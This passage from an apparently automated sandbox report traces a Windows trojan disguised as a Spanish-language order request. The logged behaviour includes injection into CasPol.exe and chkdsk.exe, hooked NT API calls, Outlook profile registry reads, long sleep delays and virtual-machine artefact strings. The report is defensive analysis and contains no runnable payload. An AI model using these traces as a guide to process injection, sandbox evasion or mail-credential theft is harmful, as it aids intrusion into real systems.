          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F98A0 NtWriteVirtualMemory,1_2_013F98A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9B00 NtSetValueKey,1_2_013F9B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013FA3B0 NtGetContextThread,1_2_013FA3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9A10 NtQuerySection,1_2_013F9A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9A80 NtOpenDirectoryObject,1_2_013F9A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013FAD30 NtSetContextThread,1_2_013FAD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9520 NtWaitForSingleObject,1_2_013F9520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9560 NtWriteFile,1_2_013F9560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F95F0 NtQueryInformationFile,1_2_013F95F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9730 NtQueryVirtualMemory,1_2_013F9730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013FA710 NtOpenProcessToken,1_2_013FA710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9770 NtSetInformationFile,1_2_013F9770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013FA770 NtOpenThread,1_2_013FA770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9760 NtOpenProcess,1_2_013F9760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9610 NtEnumerateValueKey,1_2_013F9610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9670 NtQueryInformationProcess,1_2_013F9670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9650 NtQueryValueKey,1_2_013F9650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F96D0 NtCreateKey,1_2_013F96D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9540 NtReadFile,LdrInitializeThunk,3_2_055D9540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9560 NtWriteFile,LdrInitializeThunk,3_2_055D9560
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D95D0 NtClose,LdrInitializeThunk,3_2_055D95D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9710 NtQueryInformationToken,LdrInitializeThunk,3_2_055D9710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9FE0 NtCreateMutant,LdrInitializeThunk,3_2_055D9FE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9780 NtMapViewOfSection,LdrInitializeThunk,3_2_055D9780
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9650 NtQueryValueKey,LdrInitializeThunk,3_2_055D9650
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_055D9660
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9610 NtEnumerateValueKey,LdrInitializeThunk,3_2_055D9610
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D96D0 NtCreateKey,LdrInitializeThunk,3_2_055D96D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_055D96E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_055D9910
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D99A0 NtCreateSection,LdrInitializeThunk,3_2_055D99A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9840 NtDelayExecution,LdrInitializeThunk,3_2_055D9840
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_055D9860
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9A50 NtCreateFile,LdrInitializeThunk,3_2_055D9A50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055DAD30 NtSetContextThread,3_2_055DAD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9520 NtWaitForSingleObject,3_2_055D9520
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D95F0 NtQueryInformationFile,3_2_055D95F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055DA770 NtOpenThread,3_2_055DA770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9770 NtSetInformationFile,3_2_055D9770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9760 NtOpenProcess,3_2_055D9760
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055DA710 NtOpenProcessToken,3_2_055DA710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9730 NtQueryVirtualMemory,3_2_055D9730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D97A0 NtUnmapViewOfSection,3_2_055D97A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9670 NtQueryInformationProcess,3_2_055D9670
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9950 NtQueueApcThread,3_2_055D9950
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D99D0 NtCreateProcessEx,3_2_055D99D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055DB040 NtSuspendThread,3_2_055DB040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9820 NtEnumerateKey,3_2_055D9820
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D98F0 NtReadVirtualMemory,3_2_055D98F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D98A0 NtWriteVirtualMemory,3_2_055D98A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9B00 NtSetValueKey,3_2_055D9B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055DA3B0 NtGetContextThread,3_2_055DA3B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9A10 NtQuerySection,3_2_055D9A10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9A00 NtProtectVirtualMemory,3_2_055D9A00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9A20 NtResumeThread,3_2_055D9A20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D9A80 NtOpenDirectoryObject,3_2_055D9A80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3C8E0 NtReadFile,3_2_00B3C8E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3C830 NtCreateFile,3_2_00B3C830
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3C930 NtDeleteFile,3_2_00B3C930
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3C960 NtClose,3_2_00B3C960
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3CA10 NtAllocateVirtualMemory,3_2_00B3CA10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3C8DA NtReadFile,3_2_00B3C8DA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3C95B NtClose,3_2_00B3C95B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3CA0A NtAllocateVirtualMemory,3_2_00B3CA0A
          Source: Requisito de pedido #23022300.exeStatic PE information: No import functions for PE file found
          Source: Requisito de pedido #23022300.exe, 00000000.00000000.307920056.0000019FB1AD4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNMNhH726.exe2 vs Requisito de pedido #23022300.exe
          Source: Requisito de pedido #23022300.exe, 00000000.00000002.317344823.0000019FB1E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs Requisito de pedido #23022300.exe
          Source: Requisito de pedido #23022300.exe, 00000000.00000002.316401782.0000019FB1BF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Requisito de pedido #23022300.exe
          Source: Requisito de pedido #23022300.exe, 00000000.00000002.317547747.0000019FB382D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs Requisito de pedido #23022300.exe
          Source: Requisito de pedido #23022300.exeBinary or memory string: OriginalFilenameNMNhH726.exe2 vs Requisito de pedido #23022300.exe
          Source: Requisito de pedido #23022300.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Requisito de pedido #23022300.exeReversingLabs: Detection: 15%
          Source: Requisito de pedido #23022300.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Requisito de pedido #23022300.exe C:\Users\user\Desktop\Requisito de pedido #23022300.exe
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Requisito de pedido #23022300.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeFile created: C:\Users\user\AppData\Local\Temp\50-ET7Wv7Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/2@16/9
          Source: Requisito de pedido #23022300.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Requisito de pedido #23022300.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Requisito de pedido #23022300.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Requisito de pedido #23022300.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: FUCKYOU.pdb source: Requisito de pedido #23022300.exe, 00000000.00000002.317344823.0000019FB1E10000.00000004.08000000.00040000.00000000.sdmp, Requisito de pedido #23022300.exe, 00000000.00000002.317547747.0000019FB382D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: chkdsk.pdbGCTL source: CasPol.exe, 00000001.00000002.354323730.0000000001360000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: NMNhH726.pdb source: Requisito de pedido #23022300.exe
          Source: Binary string: chkdsk.pdb source: CasPol.exe, 00000001.00000002.354323730.0000000001360000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: chkdsk.exe, 00000003.00000002.572301991.0000000005144000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.574754750.00000000058B3000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.318099697.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000003.356143931.00000000053DD000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000003.354326801.0000000005234000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: FUCKYOU.pdbx_ source: Requisito de pedido #23022300.exe, 00000000.00000002.317344823.0000019FB1E10000.00000004.08000000.00040000.00000000.sdmp, Requisito de pedido #23022300.exe, 00000000.00000002.317547747.0000019FB382D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: chkdsk.exe, 00000003.00000002.572301991.0000000005144000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.574754750.00000000058B3000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.318099697.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000003.356143931.00000000053DD000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000003.354326801.0000000005234000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeCode function: 0_2_0000019FB1A26721 push rsi; iretd 0_2_0000019FB1A26729
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeCode function: 0_2_0000019FB1A29C53 push rbx; iretd 0_2_0000019FB1A29C54
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeCode function: 0_2_00007FF8164035A9 push E8FFFFFAh; retf 0_2_00007FF8164035AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E84A push ebx; retf 555Dh1_2_0041E851
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004090EC push ebx; retf 1_2_004090F7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004118B6 push edi; iretd 1_2_004118CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004101C4 push ss; retf 1_2_004101CE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041B4E3 pushad ; ret 1_2_0041B4EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00401D80 push eax; ret 1_2_00401D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00408DB6 push ebx; retf 1_2_00408DB9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00411654 push esi; ret 1_2_00411656
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00405E83 push esi; ret 1_2_00405E8E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00408F31 push esp; retf 1_2_00408F43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0140D0D1 push ecx; ret 1_2_0140D0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055ED0D1 push ecx; ret 3_2_055ED0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B27033 push ebx; retf 3_2_00B27036
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B271AE push esp; retf 3_2_00B271C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B24100 push esi; ret 3_2_00B2410B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3CAC7 push ebx; retf 555Dh3_2_00B3CACE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B27369 push ebx; retf 3_2_00B27374
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B2E441 push ss; retf 3_2_00B2E44B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B39760 pushad ; ret 3_2_00B39767
          Source: Requisito de pedido #23022300.exeStatic PE information: 0xF9E48702 [Thu Nov 9 08:19:14 2102 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9087063805652695
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exe TID: 5352Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 5152Thread sleep time: -46000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E6B90 rdtsc 1_2_013E6B90
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 893Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 847Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 6.5 %
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 7.9 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B331F0 FindFirstFileW,FindNextFileW,FindClose,3_2_00B331F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B331E9 FindFirstFileW,FindNextFileW,FindClose,3_2_00B331E9
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000002.00000003.447264796.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000003.447264796.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000002.00000000.325421674.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000002.00000000.329267698.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000003.560780668.000000000CDEC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000002.00000003.453527884.000000000858E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000003.562591806.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.553557577.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.446785277.000000000CFB8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.567225838.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.453719731.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.448212550.000000000D001000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.571224960.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.551132237.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.557594467.000000000D009000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
          Source: explorer.exe, 00000002.00000003.447264796.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E6B90 rdtsc 1_2_013E6B90
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]1_2_013E513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]1_2_013E513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D4120 mov ecx, dword ptr fs:[00000030h]1_2_013D4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]1_2_013B9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]1_2_013BB171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]1_2_013BB171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BC962 mov eax, dword ptr fs:[00000030h]1_2_013BC962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]1_2_013DB944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]1_2_013DB944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
